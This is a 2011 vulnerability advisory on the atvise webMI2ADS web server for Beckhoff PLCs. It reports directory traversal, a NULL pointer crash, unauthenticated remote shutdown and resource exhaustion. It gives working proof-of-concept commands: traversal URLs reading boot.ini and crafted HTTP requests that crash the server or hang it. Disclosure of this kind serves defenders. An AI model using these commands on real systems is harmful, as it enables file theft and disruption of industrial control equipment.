扫码分享
验证:
体验盒子#######################################################################
Luigi Auriemma
Application:atvise webMI2ADS - Web server for Beckhoff PLCs
http://www.atvise.com/en/atvise-downloads/products
Versions: <= 1.0
Platforms:Windows XP embedded and CE x86/ARM
Bugs: A] directory traversal
B] NULL pointer
C] termination of the software
D] resources consumption
Exploitation: remote
Date: 10 Oct 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web:aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"webMI2ADS is a very slim and compact web server with an ADS interface
(Beckhoff native PLC interface). It can be integrated on nearly any
ethernet based Beckhoff PLC and provides full data access including
automatic import of all PLC variables and types."
#######################################################################
=======
2) Bugs
=======
----------------------
A] directory traversal
----------------------
Classical directory traversal through the backslash delimiter which
allows to get the files located on the disk where is running the
server.
---------------
B] NULL pointer
---------------
NULL pointer dereference caused by the lacking of checks on the value
returned by strchr on the Authorization Basic HTTP field:
0043094F|> 6A 06PUSH 6 ; /maxlen = 6
00430951|. 68 7CAB4400PUSH webMI2AD.0044AB7C ; |s2 = "Basic "
00430956|. 8B45 08MOV EAX,DWORD PTR SS:[EBP+8] ; |
00430959|. 50 PUSH EAX ; |s1
0043095A|. FF15 10044400CALL DWORD PTR DS:[<&MSVCR90._strnicmp>] ; \_strnicmp
...skip...
004309BC|. 6A 3APUSH 3A; /c = 3A(':')
004309BE|. 8D8D F8FEFFFFLEA ECX,DWORD PTR SS:[EBP-108] ; |
004309C4|. 51 PUSH ECX ; |s
004309C5|. FF15 FC034400CALL DWORD PTR DS:[<&MSVCR90.strchr>]; \strchr
004309CB|. 83C4 08ADD ESP,8
004309CE|. 8945 F4MOV DWORD PTR SS:[EBP-C],EAX
004309D1|. 837D FC 00 CMP DWORD PTR SS:[EBP-4],0
004309D5|. 74 4BJE SHORT webMI2AD.00430A22
004309D7|. 8B55 F4MOV EDX,DWORD PTR SS:[EBP-C]
004309DA|. 2B55 FCSUB EDX,DWORD PTR SS:[EBP-4]
004309DD|. 83FA 40CMP EDX,40
004309E0|. 7D 40JGE SHORT webMI2AD.00430A22
004309E2|. 8B45 F4MOV EAX,DWORD PTR SS:[EBP-C]
004309E5|. C600 00MOV BYTE PTR DS:[EAX],0
------------------------------
C] termination of the software
------------------------------
For terminating the software remotely it's enough to go on the
/shutdown webpage.
------------------------
D] resources consumption
------------------------
Endless loop with memory consumption and CPU at 100% caused by a
particular negative Content-Length.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/mytoolz/mydown.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17963-1.zip
http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17879.zip
A]
mydown http://SERVER/..\..\..\..\..\..\..\boot.ini
mydown http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
B]
udpsz -c "GET / HTTP/1.0\r\nAuthorization: Basic blah\r\n\r\n" -T -D SERVER 80 -1
C]
http://SERVER/shutdown
D]
udpsz -c "POST / HTTP/1.0\r\nContent-Length: -30\r\n\r\n" -T -D SERVER 80 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
体验盒子
